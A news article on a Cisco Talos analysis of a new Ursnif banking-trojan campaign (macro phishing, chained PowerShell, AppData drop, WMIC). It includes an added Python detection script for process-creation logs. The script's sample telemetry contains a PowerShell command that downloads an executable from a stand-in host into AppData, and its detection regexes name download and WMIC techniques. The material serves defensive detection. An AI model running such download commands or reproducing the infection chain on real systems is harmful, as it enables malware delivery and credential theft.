This old trojan learns new tricks in its latest banking info and password-stealing campaign

This banking trojan has a long history, but it's still going strong - and still being updated.
Written by Danny Palmer, Senior Writer

An infamous form of banking trojan malware with a history going back over a decade has been updated with additional infection techniques as part of a new campaign targeting financial data and passwords.

Ursnif is one of the most popular families of Windows banking trojans deployed by cyber criminals and the code behind it has been active in one form or another since at least 2007 when it first emerged in the Gozi banking trojan.

Gozi's source code was leaked in 2010, leading to several different versions of the malware emerging and targeting banks. Arguably the most successful version of the malware built on Gozi's source code, Ursnif is still being actively developed and deployed 12 years on from when the threat first appeared.

Uncovered by researchers at Cisco Talos, the latest Ursnif campaign is distributed in the same way as many other forms of malware — in phishing emails, containing malicious attachments. In this instance, the user is encouraged to open a Microsoft Word document, which presents them with instructions to 'enable content' to see what is inside.

This is a ploy to trick the user into enabling macros, which allows obfuscated code to be executed and ultimately leads to the system being compromised by the malware.

However, Ursnif isn't downloaded straight from the malicious document. Instead, the obfuscated macro code runs a PowerShell command, which in turn launches a second PowerShell command that downloads an Ursnif executable from a command and control server into the victim's AppData directory.


Distributing the malware in this way makes the malicious activity harder to spot, increasing the chances of a successful infection because the download often can't be distinguished from normal traffic — although Cisco Talos uncovered the campaign after its exploit-prevention engine picked up and blocked an attack at exactly this stage.

Once the Ursnif executable is running from the AppData directory, it uses the Windows Management Instrumentation Command-line (WMIC) to launch PowerShell, which ultimately runs the code that retrieves the malware and injects it into the system.

Following a successful installation, Ursnif makes requests to a command and control server. Stolen data is packed into a compressed CAB file before being exfiltrated from the machine, giving the attackers banking information, login details and more.
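The infection chain above (an enabled Word macro launching PowerShell, PowerShell dropping an executable under AppData, then WMIC launching PowerShell again) leaves a recognisable trail in process-creation telemetry. The following script is an added detection example written for this article; it is not code from Cisco Talos or ZDNet. The event layout (parent image, image, command line), the sample records and the stage names are constructed assumptions, chosen to resemble Sysmon-style process-creation logs.

```python
"""
Added example: flag the process-creation stages of the Ursnif delivery chain.
Event layout, sample records and stage names are constructed assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from ntpath import basename  # splits Windows paths correctly on any OS
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download primitives commonly seen in PowerShell stagers, paired with an
# executable path under AppData (the drop location named in the article).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.I)
APPDATA_EXE_RE = re.compile(r"appdata\\[^\s'\"]*\.exe", re.I)
# WMIC spawning PowerShell through "process call create".
WMIC_CREATE_RE = re.compile(r"process\s+call\s+create.*powershell", re.I)


def stage_of(ev: ProcEvent) -> Optional[str]:
    """Return the chain stage an event matches, or None for benign events."""
    parent = basename(ev.parent_image).lower()
    image = basename(ev.image).lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        return "office_macro_launches_script_host"
    if (image in POWERSHELL and DOWNLOAD_RE.search(ev.command_line)
            and APPDATA_EXE_RE.search(ev.command_line)):
        return "powershell_downloads_exe_to_appdata"
    if (parent == "wmic.exe" and image in POWERSHELL) or (
            image == "wmic.exe" and WMIC_CREATE_RE.search(ev.command_line)):
        return "wmic_launches_powershell"
    return None


def triage(events: List[ProcEvent]) -> Dict[str, List[Tuple[str, str]]]:
    """Group matching events by host as (stage, command line) pairs."""
    hits: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for ev in events:
        stage = stage_of(ev)
        if stage:
            hits[ev.host].append((stage, ev.command_line))
    return dict(hits)


def stages_seen(events: List[ProcEvent], host: str) -> List[str]:
    """Distinct chain stages observed on one host; three means the full chain."""
    return sorted({stage for stage, _ in triage(events).get(host, [])})


# Constructed sample telemetry (not real logs). ws01 shows the full chain,
# ws02 shows ordinary activity that should not fire.
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    ProcEvent("ws01", EXPLORER, WORD, '"WINWORD.EXE" invoice.doc'),
    ProcEvent("ws01", WORD, PS, "powershell -w hidden -enc AAAA"),
    ProcEvent("ws01", PS, PS,
              "powershell -nop -c \"(New-Object Net.WebClient).DownloadFile("
              "'http://c2.invalid/u.bin','C:\\Users\\alice\\AppData\\Roaming\\svc.exe')\""),
    ProcEvent("ws01", PS, WMIC, 'wmic process call create "powershell -enc AAAA"'),
    ProcEvent("ws01", WMIC, PS, "powershell -enc AAAA"),
    ProcEvent("ws02", EXPLORER, PS, "powershell Get-Process"),
    ProcEvent("ws02", WORD, r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, stages_seen(SAMPLE_EVENTS, host))
        for stage, cmd in hits:
            print(f"  [{stage}] {cmd}")
```

Each rule on its own is noisy in a large estate (administrators do run PowerShell downloads), so the useful signal is several stages landing on the same host in a short window; `stages_seen` gives that per-host view, and the first stage alone (an Office application spawning a script host) is worth alerting on regardless.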

Ursnif is regularly updated with new attack techniques and this appears to be just the latest in a long line of changes made to the malware in order to make it more effective.

Cisco Talos has published the Indicators of Compromise for the latest version of Ursnif in their analysis of the malware.


Editorial standards